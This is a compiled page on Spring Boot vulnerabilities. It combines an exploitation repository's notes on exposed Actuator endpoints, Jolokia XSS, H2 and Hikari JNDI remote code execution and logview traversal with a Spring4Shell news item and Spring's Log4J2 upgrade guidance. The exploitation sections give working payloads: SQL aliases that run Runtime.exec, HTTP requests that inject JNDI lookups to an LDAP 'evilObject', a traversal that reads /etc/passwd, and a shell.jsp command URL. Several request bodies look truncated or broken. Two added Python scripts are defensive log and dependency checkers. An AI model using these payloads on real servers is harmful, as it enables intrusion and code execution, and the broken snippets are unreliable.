Java Spring Boot vulnerabilities


pyn3rd/Spring-Boot-Vulnerability


Spring Boot Vulnerability (Keep On Updating)

0x01 Spring Boot Actuator Exposed

Actuator endpoints allow you to monitor and interact with your Spring application. Spring Boot includes a number of built-in endpoints and you can also add your own. For example, the health endpoint provides basic application health information. The following endpoints are available:

/autoconfig — Displays an auto-configuration report showing all auto-configuration candidates and the reason why they ‘were’ or ‘were not’ applied.

/beans — Displays a complete list of all the Spring beans in your application.

/configprops — Displays a collated list of all @ConfigurationProperties.

/dump — Performs a thread dump.

/heapdump — JVM heap dump information. It is actually a binary file; you can use the tool MemoryAnalyzer to analyze it. This file may contain PASSWORD / ACCESS_KEY / COOKIES / ACCESS_TOKEN or other sensitive information.

/env — Exposes properties from Spring’s ConfigurableEnvironment.

/health — Shows application health information (a simple ‘status’ when accessed over an unauthenticated connection or full message details when authenticated).

/info — Displays arbitrary application info.

/metrics — Shows ‘metrics’ information for the current application.

/mappings — Displays a collated list of all @RequestMapping paths.

/shutdown — Allows the application to be gracefully shutdown (not enabled by default).

/pause — Allows the application to be gracefully paused (not enabled by default).

/resume — Allows the application to be gracefully resumed (not enabled by default).

/trace — Displays trace information (by default the last few HTTP requests).

0x02 Spring Boot RCE/XSS involving Jolokia

0x002 Jolokia XSS fixed since Jolokia 1.5.0 (CVE-2018-1000129)

```xml
<dependency>
    <groupId>org.jolokia</groupId>
    <artifactId>jolokia-core</artifactId>
    <version>1.4.0</version>
</dependency>
```

When visiting URL http://127.0.0.1:10090/actuator/jolokia/read%3Csvg%20onload=alert('xss')%3E?mimeType=text/html

0x03 Spring Boot RCE involving H2 Database JNDI Injection

```xml
<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-data-jpa</artifactId>
    <version>2.2.6.RELEASE</version>
</dependency>
<dependency>
    <groupId>com.h2database</groupId>
    <artifactId>h2</artifactId>
    <version>1.4.2</version>
    <scope>runtime</scope>
</dependency>
```

```properties
spring.h2.console.enabled=true
spring.h2.console.settings.web-allow-others=true
```

You can visit /actuator/env to make sure the H2 Console is enabled.

Example 1: Execute open -a Calculator Command

0x04 Spring Boot RCE involving H2 Database ALIAS Command

Example 1: Execute id Command

```sql
CREATE ALIAS EXECMD AS $$
String execmd(String cmd) throws java.io.IOException {
    java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A");
    return s.hasNext() ? s.next() : "";
}
$$;
CALL EXECMD('id')
```

Example 2: Execute open -a Calculator Command

```sql
CREATE ALIAS EXECMD AS $$
String execmd(String cmd) throws java.io.IOException {
    Runtime.getRuntime().exec(cmd);
    return null;
}
$$;
CALL EXECMD('open -a Calculator');
```

0x05 Spring Boot RCE involving JMX enabled

When visiting URL http://127.0.0.1:10090/actuator/env/spring.jmx.enabled, you will find that JMX is enabled.

Example 1: Execute open -a Calculator Command

0x06 Spring Boot RCE involving H2 Database

0x001 Remote Code Execution via spring.datasource.hikari.connection-test-query or spring.datasource.hikari.connection-init-sql

Example 1: spring.datasource.hikari.connection-init-sql

```http
POST /actuator/env HTTP/1.1
Host: 127.0.0.1:10090
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Content-Length: 280

$$;CALL EXECMD('open -a Calculator');"}
```

```http
POST /actuator/restart HTTP/1.1
```

```http
POST /actuator/env HTTP/1.1
Host: 127.0.0.1:10090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Content-Type: application/json
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,fr;q=0.6
Connection: close
Content-Length: 320

{
  "name": "spring.datasource.hikari.connection-init-sql",
  "value": "CREATE ALIAS jndi AS $$ import javax.naming.InitialContext;@CODE String jndi(String url) throws Exception $$;CALL jndi('ldap://127.0.0.1:1389/evilObject');"
}
```

```http
POST /actuator/restart HTTP/1.1
```

```http
POST /actuator/env HTTP/1.1
Host: 127.0.0.1:10090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Content-Type: application/json
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,ja;q=0.7,fr;q=0.6
Connection: close
Content-Length: 320

{
  "name": "spring.datasource.hikari.connection-init-sql",
  "value": "CREATE ALIAS remoteUrl AS $$ import java.net.*;@CODE String remoteUrl() throws Exception { Class.forName (\"pop\", true, new URLClassLoader(new URL[])).newInstance();return null;}$$;CALL remoteUrl()"
}
```

```http
POST /actuator/restart HTTP/1.1
```

0x07 Spring Boot RCE involving MyBatis (CVE-2020-26945)

0x08 Spring Boot Actuator Logview Directory Traversal (CVE-2021-21234)


Set a breakpoint at securityCheck().


Construct the directory traversal request URL.


spring.log/../../../../../ is used as the folder, and /etc/passwd is the file we want.


In toFile(), the folder spring.log/../../../../../ and the file /etc/passwd are concatenated into a path without securityCheck().

Retrieve the content of the file /etc/passwd.

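As an added defender-side example that is not part of the original repository, the following Python scans access log lines for the request patterns sections 0x01 to 0x08 depend on: POSTs to state-changing actuator endpoints (env, restart, shutdown, pause, resume), reads of secret-bearing endpoints such as heapdump, markup reflected through the jolokia endpoint, and path traversal sequences like the logview base/filename abuse. The log lines and the /logs/view path are constructed samples; only the endpoint names come from the sections above.

```python
import re
from urllib.parse import unquote

# Constructed sample access log lines (Combined Log Format); not taken from the page.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2023:10:00:00 +0000] "GET /actuator/health HTTP/1.1" 200 15
10.0.0.7 - - [01/Jan/2023:10:00:01 +0000] "POST /actuator/env HTTP/1.1" 200 0
10.0.0.7 - - [01/Jan/2023:10:00:02 +0000] "POST /actuator/restart HTTP/1.1" 200 0
10.0.0.9 - - [01/Jan/2023:10:00:03 +0000] "GET /actuator/heapdump HTTP/1.1" 200 52428800
10.0.0.9 - - [01/Jan/2023:10:00:04 +0000] "GET /actuator/jolokia/read%3Csvg%20onload=alert(1)%3E?mimeType=text/html HTTP/1.1" 200 310
10.0.0.11 - - [01/Jan/2023:10:00:05 +0000] "GET /logs/view?base=spring.log/..%2F..%2F..%2F&filename=/etc/passwd HTTP/1.1" 200 2048
10.0.0.5 - - [01/Jan/2023:10:00:06 +0000] "GET /api/orders HTTP/1.1" 200 512
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3})')
# A POST to one of these rewrites runtime state (0x03-0x06 chain env + restart);
# a GET of one of the second set leaks configuration, secrets or memory (0x01).
STATE_CHANGING = {"/env", "/restart", "/shutdown", "/pause", "/resume"}
SENSITIVE_READ = {"/env", "/heapdump", "/beans", "/configprops", "/mappings", "/dump", "/trace"}


def classify(method: str, raw_target: str):
    """Return (rule, severity) for one request, or None when nothing matches."""
    target = unquote(raw_target)             # decode %2F, %3C, ... before matching
    path, _, query = target.partition("?")
    # Boot 2 serves endpoints under /actuator; Boot 1 served them at the root.
    endpoint = path[len("/actuator"):] if path.startswith("/actuator") else path
    if ".." in path or ".." in query:
        return ("path-traversal", "high")         # logview base/filename style (0x08)
    if "jolokia" in path and ("<" in path or "<" in query):
        return ("jolokia-reflected-markup", "high")   # CVE-2018-1000129 pattern (0x02)
    if method == "POST" and endpoint in STATE_CHANGING:
        return ("actuator-state-change", "high")
    if method == "GET" and endpoint in SENSITIVE_READ:
        return ("actuator-sensitive-read", "medium")
    if path.startswith("/h2-console"):
        return ("h2-console-exposed", "medium")   # console reachable over HTTP (0x03)
    return None


def scan_access_log(text: str):
    """Parse each line and collect one finding dict per suspicious request, in log order."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, method, target, status = m.groups()
        hit = classify(method, target)
        if hit:
            findings.append({"ip": ip, "method": method, "target": target,
                             "status": int(status), "rule": hit[0], "severity": hit[1]})
    return findings
```

A 200 status on the state-changing rules is the signal that the endpoint was not merely probed but actually accepted the write.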

0x09 Spring Boot Log4j2 JNDI Injection

Source

Spring4Shell RCE: a critical vulnerability in the Java Spring Framework

The world had barely recovered from Apache Log4j2 (CVE-2021-44228) when reports of new 0-day vulnerabilities appeared online. Several zero-day vulnerabilities have been discovered in the Spring Framework for Java, including ones that allow arbitrary code execution (RCE).

At the moment, three flaws have been identified:

  • RCE in the Spring Cloud Function library (CVE-2022-22963); the vulnerability affects library versions prior to 3.2.3;
  • A medium-severity vulnerability that can cause a DoS condition (CVE-2022-22950); it affects Spring Framework versions 5.3.0 through 5.3.16;
  • Spring4Shell in Spring Core: a class injection vulnerability used to achieve RCE (no CVE identifier has been assigned yet).

This information is provided for educational purposes; do not break the law.

Spring4Shell in Spring Core

Clients running JDK 9 or newer are vulnerable to a remote code execution attack due to a bypass of CVE-2010-1622. All versions of Spring Core are affected (no fix has been released yet). The vulnerability affects functions that use RequestMapping and POJO (Plain Old Java Object) parameters.

The exploit boils down to sending a request with class.module.classLoader.resources.context.parent.pipeline.first.* parameters; when these are processed with WebappClassLoaderBase, the AccessLogValve class is accessed. That class lets the attacker configure the logger so that it creates an arbitrary jsp file in the Apache Tomcat root and writes attacker-supplied code into that file. The created file then becomes reachable by direct requests.

The result of exploitation is a created shell.jsp which, when requested, allows arbitrary commands to be executed on the server, for example:

# curl http://example.com/shell.jsp?cmd=whoami

The exploit is already publicly available, but for ethical reasons we will not publish a PoC.

The developers have not yet released a patch, but you can use Nemesida WAF, which blocks attempts to exploit this and other vulnerabilities, including bypass techniques. Stay protected.

Source

Log4J2 Vulnerability and Spring Boot

Updates: Since this blog post was published, a new logback 1.2.9 version has been published. While this fixes a security issue, the prerequisites for exploits are very different as they "require write access to logback's configuration file". Log4J also released a new 2.17.0 version with fixes for CVE-2021-45046 and CVE-2021-45105. Spring Boot 2.5.8 and 2.6.2 have been released and provide dependency management for logback 1.2.9 and Log4J 2.17.0. Log4J 2.17.1 contains a fix for CVE-2021-44832.

As you may have seen in the news, a new zero-day exploit has been reported against the popular Log4J2 library which can allow an attacker to remotely execute code. The vulnerability has been reported with CVE-2021-44228 against the log4j-core jar and has been fixed in Log4J v2.15.0.

Spring Boot users are only affected by this vulnerability if they have switched the default logging system to Log4J2. The log4j-to-slf4j and log4j-api jars that we include in spring-boot-starter-logging cannot be exploited on their own. Only applications using log4j-core and including user input in log messages are vulnerable.

Our upcoming v2.5.8 & v2.6.2 releases (due Dec 23, 2021) will pick up Log4J v2.17.0, but since this is such a serious vulnerability you may want to override our dependency management and upgrade your Log4J2 dependency sooner.

Maven

For Maven users, you can follow these instructions and set the log4j2.version property.

For example, if you are using our parent POM you can set the log4j2.version property:

If you are not using our parent, but instead are importing the spring-boot-dependencies BOM, you'll need to use a dependencyManagement section:

```xml
<dependencyManagement>
    <dependencies>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-bom</artifactId>
            <version>2.17.1</version>
            <type>pom</type>
            <scope>import</scope>
        </dependency>
        <!-- ... other dependencies including spring-boot-dependencies -->
    </dependencies>
</dependencyManagement>
```

To check that the override has been applied, run ./mvnw dependency:list | grep log4j and check that the version is 2.17.1.
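As an added example (not from the Spring blog post), this Python parses the ./mvnw dependency:list output that the grep above inspects and reports every org.apache.logging.log4j artifact still resolved below 2.17.1, which catches a partial override where, say, log4j-api was bumped but log4j-core was not. The sample output is constructed; the line format groupId:artifactId:type[:classifier]:version:scope is the one Maven's dependency:list prints.

```python
import re

# Constructed excerpt of `./mvnw dependency:list` output; not taken from the page.
SAMPLE_OUTPUT = """\
[INFO] The following files have been resolved:
[INFO]    org.springframework.boot:spring-boot-starter-log4j2:jar:2.5.7:compile
[INFO]    org.apache.logging.log4j:log4j-api:jar:2.17.1:compile
[INFO]    org.apache.logging.log4j:log4j-core:jar:2.14.1:compile
[INFO]    org.apache.logging.log4j:log4j-jul:jar:2.14.1:compile
[INFO]    org.apache.logging.log4j:log4j-slf4j-impl:jar:2.17.1:compile
[INFO]    org.slf4j:slf4j-api:jar:1.7.32:compile
"""

# dependency:list prints groupId:artifactId:type[:classifier]:version:scope
DEP_RE = re.compile(r"^\[INFO\]\s+([\w.\-]+):([\w.\-]+):(?:[\w.\-]+:){1,2}([\w.\-]+):(\w+)\s*$")

LOG4J_GROUP = "org.apache.logging.log4j"


def parse_version(v: str):
    """'2.17.1' -> (2, 17, 1); non-numeric parts (e.g. a '-rc1' suffix) sort lowest."""
    parts = []
    for p in re.split(r"[.\-]", v):
        parts.append(int(p) if p.isdigit() else -1)
    return tuple(parts)


def log4j_artifacts(output: str) -> dict:
    """Map each org.apache.logging.log4j artifact in the listing to its resolved version."""
    found = {}
    for line in output.splitlines():
        m = DEP_RE.match(line)
        if m and m.group(1) == LOG4J_GROUP:
            found[m.group(2)] = m.group(3)
    return found


def outdated_log4j(output: str, minimum: str = "2.17.1") -> list:
    """Artifacts still below `minimum`. log4j-core is the jar CVE-2021-44228 applies to,
    but any log4j artifact left behind shows the version override did not fully take."""
    floor = parse_version(minimum)
    return sorted(a for a, v in log4j_artifacts(output).items() if parse_version(v) < floor)
```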

Gradle

For Gradle users, you can follow these instructions and update the version property, import the BOM or use a resolutionStrategy.

For most users, setting the log4j2.version property will be sufficient:

If you’re using Gradle’s platform support instead of our dependency management plugin then you can add a dependency to the Log4J BOM:

implementation(platform("org.apache.logging.log4j:log4j-bom:2.17.1")) 

And if you can't use either of those methods then you can declare a resolutionStrategy:

```groovy
configurations.all {
    resolutionStrategy.eachDependency { DependencyResolveDetails details ->
        if (details.requested.group == 'org.apache.logging.log4j') {
            details.useVersion '2.17.1'
        }
    }
}
```

Whichever method you choose, to check that the override has been applied you can run ./gradlew dependencyInsight --dependency log4j-core and look for version 2.17.1.

Source
